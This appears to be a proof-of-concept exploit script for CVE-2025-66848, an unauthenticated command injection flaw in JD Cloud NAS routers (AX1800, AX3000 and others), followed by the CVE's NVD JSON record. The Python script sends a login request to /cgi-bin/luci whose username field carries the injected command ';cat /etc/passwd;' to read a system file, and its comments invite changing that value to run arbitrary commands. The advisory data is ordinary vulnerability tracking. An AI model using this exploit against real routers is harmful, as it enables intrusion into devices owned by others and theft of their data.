CVE-2025-66848

import requests import sys # CVE-2025-66848 PoC - JD Cloud NAS Router Unauthenticated RCE # Target: JD Cloud NAS routers (AX1800, AX3000, AX6600, BE6500, ER1, ER2) def exploit(target_ip, target_port=80): """ Exploit for CVE-2025-66848: Unauthenticated Remote Command Execution This PoC demonstrates how an unauthenticated attacker can execute arbitrary commands on affected JD Cloud NAS routers. """ url = f"http://{target_ip}:{target_port}/cgi-bin/luci" # Payload to execute arbitrary command (e.g., cat /etc/passwd) # Modify 'cmd' parameter for different commands payload = { 'username': ';cat /etc/passwd;', 'password': 'dummy' } try: # Attempt authentication bypass + command injection response = requests.post(url, data=payload, timeout=10) print(f"[*] Request sent to {url}") print(f"[*] Status code: {response.status_code}") if response.status_code == 200: print("[+] Target may be vulnerable!") print("[*] Response preview:") print(response.text[:500]) else: print("[-] Target may not be vulnerable or not reachable") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False return True if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 exploit(target, port)

{"cve": {"id": "CVE-2025-66848", "sourceIdentifier": "[email protected]", "published": "2025-12-30T17:15:43.357", "lastModified": "2026-01-09T19:57:09.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "JD Cloud NAS routers AX1800 (4.3.1.r4308 and earlier), AX3000 (4.3.1.r4318 and earlier), AX6600 (4.5.1.r4533 and earlier), BE6500 (4.4.1.r4308 and earlier), ER1 (4.5.1.r4518 and earlier), and ER2 (4.5.1.r4518 and earlier) contain an unauthorized remote command execution vulnerability."}, {"lang": "es", "value": "Los routers NAS JD Cloud AX1800 (4.3.1.r4308 y anteriores), AX3000 (4.3.1.r4318 y anteriores), AX6600 (4.5.1.r4533 y anteriores), BE6500 (4.4.1.r4308 y anteriores), ER1 (4.5.1.r4518 y anteriores), y ER2 (4.5.1.r4518 y anteriores) contienen una vulnerabilidad de ejecución remota de comandos no autorizada."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:jdcloud:ax1800_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.3.1.r4308", "matchCriteriaId": "4B97F646-335D-4D9E-AC5A-B2FE054DDC92"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:jdcloud:ax1800:-:*:*:*:*:*:*:*", "matchCriteriaId": "96CF5056-14B0-4759-9AB7-BBCC6C45F6D1"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:jdcloud:ax3000_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.3.1.r4318", "matchCriteriaId": "35803C35-4BCB-424B-BB99-AE7ED3E625E5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:jdcloud:ax3000:-:*:*:*:*:*:*:*", "matchCriteriaId": "E2FD6853-715D-439D-9E04-0BA88A1534BE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:jdcloud:ax6600_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.5.1.r4533", "matchCriteriaId": "AAD2DA42-EBF5-46D3-8D2C-C1E1C9BFE345"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:jdcloud:ax6600:-:*:*:*:*:*:*:*", "matchCriteriaId": "F6C4FCF2-BA40-43F2-ADB1-C8A58052600B"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:jdcloud:be6500_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.4.1.r4308", "matchCriteriaId": "DF51D33D-440D-4DD5-A4A4-8FBF832A6DDC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:jdcloud:be6500:-:*:*:*:*:*:*:*", "matchCriteriaId": "FEF4502D-C7B2-481F-9835-D9E50B3E3E82"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:jdcloud:er1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.5.1.r4518", "matchCriteriaId": "50941751-AB04-4567-8BC9-C6B326C8F651"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:jdcloud:er1:-:*:*:*:*:*:*:*", "matchCriteriaId": "81E9D9ED-2232-4D73-89D8-BD344857CBD7"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:jdcloud:er2_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.5.1.r4518", "matchCriteriaId": "5F69AF1F-4ADA-4F7A-9142-0DB76DE80FD8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:jdcloud:er2:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2513752-2EBE-41C1-9489-AF0464138311"}]}]}], "references": [{"url": "http://jd.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.notion.so/JD-Cloud-Unauth-RCE-2d22b76e8e0c802c975bf186b208d0c2", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.jdcloud.com/cn/", "source": "[email protected]", "tags": ["Product"]}]}}